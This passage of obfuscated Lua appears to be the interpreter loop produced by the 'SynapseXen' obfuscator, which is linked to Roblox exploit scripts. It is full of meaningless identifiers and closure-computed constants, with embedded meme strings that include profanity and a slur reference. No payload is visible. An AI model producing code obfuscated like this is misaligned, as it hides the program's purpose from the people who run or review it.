SynapseXen_IiliiliIiiIiiIliIlI=SynapseXen_liIilIlIllIill,SynapseXen_iIIIIlliilIIiIl do SynapseXen_iiiillil=SynapseXen_iiiillil+1;SynapseXen_iiIlIIi[SynapseXen_iiiillil]=SynapseXen_llIlIliI[SynapseXen_IiliiliIiiIiiIliIlI]end;return SynapseXen_iiIlIIi,SynapseXen_iiiillil elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[1276919324]or(function()local SynapseXen_IiIil="pain is gonna use the backspace method on xen"SynapseXen_ilIliiI[1276919324]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1920922950,1702935224),SynapseXen_IiilillliiIi(1454161955,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{1561301518,2768485873}return SynapseXen_ilIliiI[1276919324]end)())then local SynapseXen_liIilIlIllIill=SynapseXen_iiIii(SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[3175492539]or(function()local SynapseXen_IiIil="now comes with a free n word pass"SynapseXen_ilIliiI[3175492539]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2517521152,3920280334),SynapseXen_IiilillliiIi(4218970855,SynapseXen_IllIiIili[5]))-string.len(SynapseXen_IiIil)-#{437691817,4293583718,4292206156}return SynapseXen_ilIliiI[3175492539]end)(),256),SynapseXen_iIIlIiiIiiiIIIi,256)local SynapseXen_llIlillliIl=SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[2876908709]or(function()local SynapseXen_IiIil="what are you trying to say? that fucking one dot + dot + dot + many dots is not adding adding 1 dot + dot and then adding all the dots together????"SynapseXen_ilIliiI[2876908709]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2149057689,751918448),SynapseXen_IiilillliiIi(672881608,SynapseXen_IllIiIili[5]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{594312685,3437029541,3317670677,1830656325,939329990,3334494637}return SynapseXen_ilIliiI[2876908709]end)())local SynapseXen_llIlIliI=SynapseXen_lIiil;local SynapseXen_liIIIIliiliIlli=SynapseXen_liIilIlIllIill+2;local SynapseXen_illiIliiIlliiIi={SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill](SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+1],SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+2])}for SynapseXen_IiliiliIiiIiiIliIlI=1,SynapseXen_llIlillliIl do SynapseXen_lIiil[SynapseXen_liIIIIliiliIlli+SynapseXen_IiliiliIiiIiiIliIlI]=SynapseXen_illiIliiIlliiIi[SynapseXen_IiliiliIiiIiiIliIlI]end;if SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+3]~=nil then SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+2]=SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+3]else SynapseXen_lIIIllIiiIIlil=SynapseXen_lIIIllIiiIIlil+1 end elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[835993762]or(function(...)local SynapseXen_IiIil="sometimes it be like that"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(4231917170,2372567472)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(2201001842,2093986065)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[835993762]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1410521845,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(979962808,SynapseXen_IllIiIili[4]))-string.len(SynapseXen_IiIil)-#{4281670552,2926805203,3637367889,1375068978,4029240021,904434920,2357882320,4258610915,2948268927}return SynapseXen_ilIliiI[835993762]end)({},"ilililiIllIl","IlII",{},{},"IlilIiIiIIiIlll"))then SynapseXen_lIiil[SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[2210513916]or(function(...)local SynapseXen_IiIil="i put more time into this shitty list of dead memes then i did into the obfuscator itself"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(1234372228,2378011985)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(196445911,4098516207)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2210513916]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(236886195,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2223203903,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{2216239854,2810762166,2795740392,610247001,3393086092,2988857518,3302636263,2592376282,2742555011,2562799472}return SynapseXen_ilIliiI[2210513916]end)({},10312,8494,"iII",{},{},10185,{},{},{}))]=SynapseXen_lIiiIIlIlIllIIiIil[SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[2351199665]or(function(...)local SynapseXen_IiIil="epic gamer vision"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(482761171,1685268468)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(832496047,3462450285)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2351199665]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(4054207262,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3351027909,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{1394626256,3907004110,1698807178,3682305093,905016197,347770680,1593690964,437084549}return SynapseXen_ilIliiI[2351199665]end)({},"llliIIiliIIIll",1501))]elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[1092482587]or(function()local SynapseXen_IiIil="pain exist is gonna connect the dots of xen"SynapseXen_ilIliiI[1092482587]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3819504874,1036431896),SynapseXen_IiilillliiIi(585532782,SynapseXen_IllIiIili[8]))-string.len(SynapseXen_IiIil)-#{4016805713,3251458695,1718552861,4029301043}return SynapseXen_ilIliiI[1092482587]end)())then local SynapseXen_IiIiilIIliIIlliI=SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[3645746472]or(function()local SynapseXen_IiIil="SECURE API, IMPOSSIBLE TO BYPASS!"SynapseXen_ilIliiI[3645746472]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(4136243142,1547721471),SynapseXen_IiilillliiIi(3243955430,SynapseXen_IllIiIili[2]))-string.len(SynapseXen_IiIil)-#{1053612921,1658471233,3967903466,3742042617,2663546440,2813221150,1064168741}return SynapseXen_ilIliiI[3645746472]end)())local SynapseXen_llIlillliIl=SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[1922428200]or(function()local SynapseXen_IiIil="xen detects custom getfenv"SynapseXen_ilIliiI[1922428200]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1862332219,2898851864),SynapseXen_IiilillliiIi(2372307312,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{2142611850,222068852,3254809263,2932479521,3807970829,2595633385,1814804066,2785318994,3677612767,3841510777}return SynapseXen_ilIliiI[1922428200]end)())local SynapseXen_llIlIliI=SynapseXen_lIiil;if SynapseXen_IiIiilIIliIIlliI>255 then SynapseXen_IiIiilIIliIIlliI=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_IiIiilIIliIIlliI-256]else SynapseXen_IiIiilIIliIIlliI=SynapseXen_llIlIliI[SynapseXen_IiIiilIIliIIlliI]end;if SynapseXen_llIlillliIl>255 then SynapseXen_llIlillliIl=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_llIlillliIl-256]else SynapseXen_llIlillliIl=SynapseXen_llIlIliI[SynapseXen_llIlillliIl]end;SynapseXen_llIlIliI[SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[1117560265]or(function()local SynapseXen_IiIil="aspect network better obfuscator"SynapseXen_ilIliiI[1117560265]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3787465873,1033424969),SynapseXen_IiilillliiIi(2458627195,SynapseXen_IiIilliilIIl))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{1203163224}return SynapseXen_ilIliiI[1117560265]end)())]=SynapseXen_IiIiilIIliIIlliI-SynapseXen_llIlillliIl elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[2208683109]or(function(...)local SynapseXen_IiIil="now with shitty xor string obfuscation"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3988036366,1111116459)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1622627659,2672306764)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2208683109]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3123087866,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(516437206,SynapseXen_IllIiIili[7]))-string.len(SynapseXen_IiIil)-#{1570021632,3353658291}return SynapseXen_ilIliiI[2208683109]end)({},"IliIiIlIIilIill","iiIIiIilIIiiIlliII"))then local SynapseXen_liIilIlIllIill=SynapseXen_iiIii(SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[118623159]or(function()local SynapseXen_IiIil="hi devforum"SynapseXen_ilIliiI[118623159]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1829524025,3707937936),SynapseXen_IiilillliiIi(3144577299,SynapseXen_IllIiIili[7]))-string.len(SynapseXen_IiIil)-#{2833932521,2559729115,4264138448,1988487055,2685534555}return SynapseXen_ilIliiI[118623159]end)(),256),SynapseXen_iIIlIiiIiiiIIIi,256)local SynapseXen_IiIiilIIliIIlliI=SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[2087810076]or(function()local SynapseXen_IiIil="hi xen doesn't work on sk8r please help"SynapseXen_ilIliiI[2087810076]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3835746994,280963782),SynapseXen_IiilillliiIi(3129772348,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{2835817102,3429683721,1752391297,2054752680,2858658666,3187615627}return SynapseXen_ilIliiI[2087810076]end)(),512)local SynapseXen_llIlillliIl=SynapseXen_IiilillliiIi(SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[3651263893]or(function()local SynapseXen_IiIil="skisploit is the superior obfuscator, clearly."SynapseXen_ilIliiI[3651263893]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(321554525,506766008),SynapseXen_IiilillliiIi(2311241918,SynapseXen_IllIiIili[5]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{2402669909,831424396,2368653445}return SynapseXen_ilIliiI[3651263893]end)(),512),SynapseXen_iIIlIiiIiiiIIIi)local SynapseXen_llIlIliI=SynapseXen_lIiil;SynapseXen_IiIiilIIliIIlliI=SynapseXen_llIlIliI[SynapseXen_IiIiilIIliIIlliI]if SynapseXen_llIlillliIl>255 then SynapseXen_llIlillliIl=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_llIlillliIl-256]else SynapseXen_llIlillliIl=SynapseXen_llIlIliI[SynapseXen_llIlillliIl]end;SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+1]=SynapseXen_IiIiilIIliIIlliI;SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill]=SynapseXen_IiIiilIIliIIlliI[SynapseXen_llIlillliIl]elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[909502538]or(function(...)local SynapseXen_IiIil="level 1 crook = luraph, level 100 boss = xen"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(206756707,668304607)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(4059834447,235154568)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[909502538]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3477488969,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2858557730,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{529212772,435197907,1627621275,860278574,2677555201,4166162242,2955639682,715260586,2182849272}return SynapseXen_ilIliiI[909502538]end)({},{},{},13264,779,{},"IIlIIiil"))then local SynapseXen_liIilIlIllIill=SynapseXen_IlIIlIIilIililIlll(SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[3462413442]or(function()local SynapseXen_IiIil="aspect network better obfuscator"SynapseXen_ilIliiI[3462413442]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1355262870,3202459030),SynapseXen_IiilillliiIi(2693523338,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{3684022900,4277269728,1907037327,204417969,3377068914,2151771293,2015136337}return SynapseXen_ilIliiI[3462413442]end)()),SynapseXen_iIIlIiiIiiiIIIi,256)~=0;local SynapseXen_IiIiilIIliIIlliI=SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[2993248598]or(function()local SynapseXen_IiIil="imagine using some lua minifier tool and thinking you are a badass"SynapseXen_ilIliiI[2993248598]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2217046237,18266089),SynapseXen_IiilillliiIi(2585666657,SynapseXen_IllIiIili[4]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{3629603154,117776414,1686962502,2169930113}return SynapseXen_ilIliiI[2993248598]end)())local SynapseXen_llIlillliIl=SynapseXen_IlIIlIIilIililIlll(SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[2520794980]or(function()local SynapseXen_IiIil="SECURE API, IMPOSSIBLE TO BYPASS!"SynapseXen_ilIliiI[2520794980]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3245165577,205377675),SynapseXen_IiilillliiIi(836495133,SynapseXen_IllIiIili[8]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{4205070524,3934037032,2464735355,2965801190}return SynapseXen_ilIliiI[2520794980]end)(),512),SynapseXen_iIIlIiiIiiiIIIi,512)local SynapseXen_llIlIliI=SynapseXen_lIiil;if SynapseXen_IiIiilIIliIIlliI>255 then SynapseXen_IiIiilIIliIIlliI=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_IiIiilIIliIIlliI-256]else SynapseXen_IiIiilIIliIIlliI=SynapseXen_llIlIliI[SynapseXen_IiIiilIIliIIlliI]end;if SynapseXen_llIlillliIl>255 then SynapseXen_llIlillliIl=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_llIlillliIl-256]else SynapseXen_llIlillliIl=SynapseXen_llIlIliI[SynapseXen_llIlillliIl]end;if SynapseXen_IiIiilIIliIIlliI==SynapseXen_llIlillliIl~=SynapseXen_liIilIlIllIill then SynapseXen_lIIIllIiiIIlil=SynapseXen_lIIIllIiiIIlil+1 end elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[2085303014]or(function()local SynapseXen_IiIil="i put more time into this shitty list of dead memes then i did into the obfuscator itself"SynapseXen_ilIliiI[2085303014]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2040348230,1844605105),SynapseXen_IiilillliiIi(2427661791,SynapseXen_IllIiIili[5]))-string.len(SynapseXen_IiIil)-#{757961985,2495948508,2582476730,1781674083,2939722404,2092690449,3743360362,1655761860}return SynapseXen_ilIliiI[2085303014]end)())then SynapseXen_lIiil[SynapseXen_IlIIlIIilIililIlll(SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[1467024513]or(function()local SynapseXen_IiIil="wait for someone on devforum to say they are gonna deobfuscate this"SynapseXen_ilIliiI[1467024513]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(28916711,3925111160),SynapseXen_IiilillliiIi(348428103,SynapseXen_IllIiIili[8]))-string.len(SynapseXen_IiIil)-#{3322173644,1930050513,3770000001,3321895535,1149127320,2727537049,3803428133,1705374348}return SynapseXen_ilIliiI[1467024513]end)(),256),SynapseXen_iIIlIiiIiiiIIIi,256)]=-SynapseXen_lIiil[SynapseXen_IiilillliiIi(SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[2779791701]or(function(...)local SynapseXen_IiIil="xen doesn't come with instance caching, sorry superskater"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3167768857,1003923849)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(476966262,3817991317)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2779791701]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2361815456,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(351126667,SynapseXen_IllIiIili[4]))-string.len(SynapseXen_IiIil)-#{1722922364,259058570,1474852443,673943308,2630821809,2802985296}return SynapseXen_ilIliiI[2779791701]end)(13757,"lli",{},379),512),SynapseXen_iIIlIiiIiiiIIIi)]elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[1992998012]or(function()local SynapseXen_IiIil="thats how mafia works"SynapseXen_ilIliiI[1992998012]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3387898916,2977039159),SynapseXen_IiilillliiIi(4232098203,SynapseXen_IllIiIili[5]))-string.len(SynapseXen_IiIil)-#{4284465147,3926733402,1679708434,1118953742,1864518221,2753336235}return SynapseXen_ilIliiI[1992998012]end)())then local SynapseXen_liIilIlIllIill=SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[136625757]or(function()local SynapseXen_IiIil="i'm intercommunication about the most nonecclesiastical dll exploits for esp. they only characterization objects with a antepatriarchal in the geistesgeschichte for the esp."SynapseXen_ilIliiI[136625757]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2747180887,3993623108),SynapseXen_IiilillliiIi(3379100762,SynapseXen_IllIiIili[5]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{2704155339,4182419488,2414213036,1634762891,3363619457,1179684734}return SynapseXen_ilIliiI[136625757]end)(),256)local SynapseXen_IiIiilIIliIIlliI=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[683267537]or(function(...)local SynapseXen_IiIil="hi xen crashes on my axon paste plz help"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2515736983,1946408745)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(963605210,3331347726)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[683267537]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3599978363,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2043176867,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{4068226119,956622155,4074348748,1222314837,1610964603,660078373,2539482945}return SynapseXen_ilIliiI[683267537]end)(2309,"iIlIliliilillIlIiI","illiill",{},{},{})),SynapseXen_iIIlIiiIiiiIIIi)local SynapseXen_llIlillliIl=SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[3118711944]or(function()local SynapseXen_IiIil="yed"SynapseXen_ilIliiI[3118711944]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2567943667,2084060440),SynapseXen_IiilillliiIi(2878638677,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{2894578840,50745850,2679229622,1940174163,3618363976,2995210156}return SynapseXen_ilIliiI[3118711944]end)())local SynapseXen_llIlIliI=SynapseXen_lIiil;local SynapseXen_illlIillllii,SynapseXen_lliiiiiIIiIliIIll;local SynapseXen_iIIIIlliilIIiIl,SynapseXen_iiiillil;SynapseXen_illlIillllii={}if SynapseXen_IiIiilIIliIIlliI~=1 then if SynapseXen_IiIiilIIliIIlliI~=0 then SynapseXen_iIIIIlliilIIiIl=SynapseXen_liIilIlIllIill+SynapseXen_IiIiilIIliIIlliI-1 else SynapseXen_iIIIIlliilIIiIl=SynapseXen_llllIilliIllilII end;SynapseXen_iiiillil=0;for SynapseXen_IiliiliIiiIiiIliIlI=SynapseXen_liIilIlIllIill+1,SynapseXen_iIIIIlliilIIiIl do SynapseXen_iiiillil=SynapseXen_iiiillil+1;SynapseXen_illlIillllii[SynapseXen_iiiillil]=SynapseXen_llIlIliI[SynapseXen_IiliiliIiiIiiIliIlI]end;SynapseXen_iIIIIlliilIIiIl,SynapseXen_lliiiiiIIiIliIIll=SynapseXen_iIlliII(SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill](unpack(SynapseXen_illlIillllii,1,SynapseXen_iIIIIlliilIIiIl-SynapseXen_liIilIlIllIill)))else SynapseXen_iIIIIlliilIIiIl,SynapseXen_lliiiiiIIiIliIIll=SynapseXen_iIlliII(SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill]())end;SynapseXen_llllIilliIllilII=SynapseXen_liIilIlIllIill-1;if SynapseXen_llIlillliIl~=1 then if SynapseXen_llIlillliIl~=0 then SynapseXen_iIIIIlliilIIiIl=SynapseXen_liIilIlIllIill+SynapseXen_llIlillliIl-2 else SynapseXen_iIIIIlliilIIiIl=SynapseXen_iIIIIlliilIIiIl+SynapseXen_liIilIlIllIill-1 end;SynapseXen_iiiillil=0;for SynapseXen_IiliiliIiiIiiIliIlI=SynapseXen_liIilIlIllIill,SynapseXen_iIIIIlliilIIiIl do SynapseXen_iiiillil=SynapseXen_iiiillil+1;SynapseXen_llIlIliI[SynapseXen_IiliiliIiiIiiIliIlI]=SynapseXen_lliiiiiIIiIliIIll[SynapseXen_iiiillil]end end elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[314140130]or(function()local SynapseXen_IiIil="sometimes it be like that"SynapseXen_ilIliiI[314140130]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(4153317715,2180032601),SynapseXen_IiilillliiIi(953403584,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{1327970293,3369889839,1561081892,3977584660,3039870057,3721932429,3616367066,1588568559,3347480265,637269718}return SynapseXen_ilIliiI[314140130]end)())then local SynapseXen_IIiIIll=SynapseXen_IlililIiiIllI[SynapseXen_IiilillliiIi(SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[2116109763],SynapseXen_ilIliiI[1728557490]or(function(...)local SynapseXen_IiIil="wow xen is shit buy luraph ok"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(229200797,1580028453)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(4241052549,53888557)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1728557490]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(831948047,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1769041325,SynapseXen_IllIiIili[7]))-string.len(SynapseXen_IiIil)-#{1218127556,3990265972,2127276420,447025134}return SynapseXen_ilIliiI[1728557490]end)({},{},"IliIiiiilIiiIll","lliIIIlii"),262144),SynapseXen_iIIlIiiIiiiIIIi)]local SynapseXen_llIlIliI=SynapseXen_lIiil;local SynapseXen_lllIIIIIllilii;local SynapseXen_liiIllIiii;if SynapseXen_IIiIIll[2071787167]~=0 then SynapseXen_lllIIIIIllilii={}SynapseXen_liiIllIiii=setmetatable({},{__index=function(SynapseXen_IllliIiIIiiilIIlIIII,SynapseXen_lIIIlIIillliiI)local SynapseXen_ilIIllIIil=SynapseXen_lllIIIIIllilii[SynapseXen_lIIIlIIillliiI]return SynapseXen_ilIIllIIil[1][SynapseXen_ilIIllIIil[2]]end,__newindex=function(SynapseXen_IllliIiIIiiilIIlIIII,SynapseXen_lIIIlIIillliiI,SynapseXen_IllIilil)local SynapseXen_ilIIllIIil=SynapseXen_lllIIIIIllilii[SynapseXen_lIIIlIIillliiI]SynapseXen_ilIIllIIil[1][SynapseXen_ilIIllIIil[2]]=SynapseXen_IllIilil end})for SynapseXen_IiliiliIiiIiiIliIlI=1,SynapseXen_IIiIIll[2071787167]do local 